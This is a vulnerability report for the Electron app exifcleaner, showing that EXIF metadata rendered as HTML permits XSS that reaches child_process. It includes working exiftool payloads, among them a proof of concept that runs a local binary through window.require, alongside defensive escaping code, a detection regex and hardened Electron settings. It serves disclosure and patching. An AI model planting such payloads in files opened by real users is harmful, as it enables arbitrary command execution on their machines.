OS Command Injection in sztheory/exifcleaner
Reported on May 3rd 2021
✍️ Description
Command Injection using XSS via EXIF Data.
The application renders image metadata as HTML without stripping or escaping tags, so a crafted EXIF value (here the Comment tag) injects markup and script into the page (XSS).

```sh
exiftool -Comment='</strong><img src=x onerror=alert(1) /><b>OverJT</b>' MY_IMAGE.png
```
Because the application is built on Electron and Node's `require` is reachable from the renderer, the XSS escalates easily to OS command execution through the child_process module.
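The two weaknesses above (unescaped metadata in HTML, and Node APIs reachable from a renderer that shows attacker-controlled content) have separate fixes. The block below is an added example, not exifcleaner's code: it places the vulnerable concatenation beside an escaping renderer, checks whether the report's Comment payload survives as live markup, and lists the Electron `webPreferences` that keep `window.require` out of the renderer. The tag names, the `sampleTags` object and the helper names are constructed for the example.

```javascript
'use strict';
// Added example (not exifcleaner's code). Shows why rendering EXIF values as
// HTML is dangerous and how escaping plus Electron renderer settings stop the
// XSS -> child_process chain described in the report.

// Vulnerable pattern: tag values are concatenated straight into markup, so a
// Comment like the one in this report closes the <strong> and injects <img onerror>.
function renderMetadataUnsafe(tags) {
  return Object.entries(tags)
    .map(([name, value]) => `<li><strong>${name}</strong>: ${value}</li>`)
    .join('');
}

// Escape the characters that let a value break out of HTML text context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every tag name and value is escaped before it is placed in markup.
// In a real renderer, prefer document.createElement + textContent over strings.
function renderMetadata(tags) {
  return Object.entries(tags)
    .map(([name, value]) => `<li><strong>${escapeHtml(name)}</strong>: ${escapeHtml(value)}</li>`)
    .join('');
}

// Detection helper for the example: true if the rendered HTML contains any
// element other than the <li>/<strong> the renderer itself emits.
function containsInjectedTag(html) {
  return /<(?!\/?(li|strong)\b)[a-z]/i.test(html);
}

// Electron BrowserWindow settings that keep Node out of the renderer. With these,
// window.require is undefined in page scripts, so an onerror handler that runs
// despite an escaping bug still cannot reach child_process. These are the
// standard Electron hardening keys; check your Electron version's defaults.
const hardenedWebPreferences = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
};

// Constructed sample input based on the Comment payload quoted in the report.
const sampleTags = {
  Comment: '</strong><img src=x onerror=alert(1) /><b>OverJT</b>',
  Make: 'ExampleCam',
};

// Returns both renderings so the difference can be inspected or asserted on.
function demo() {
  return {
    unsafe: renderMetadataUnsafe(sampleTags),
    safe: renderMetadata(sampleTags),
  };
}

console.log(demo().safe);
```

Running the block prints the escaped list item; the `unsafe` rendering is what a browser or Electron renderer would parse into a live `<img onerror>` element, which is exactly the condition the `hardenedWebPreferences` settings are there to contain.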
🕵️‍♂️ Proof of Concept

```sh
exiftool -Comment='</strong><img src=x onerror=window.require("child_process").execFile("/usr/bin/firefox") /><b>OverJT</b>' MY_IMAGE.png
```
💥 Impact
An attacker can craft an image whose metadata, once the file is opened in the application, executes arbitrary OS commands, for example to run a reverse shell.
I have tracked the patch commit SHA against this advisory.
All green now, thanks for the heads up @Jonathan.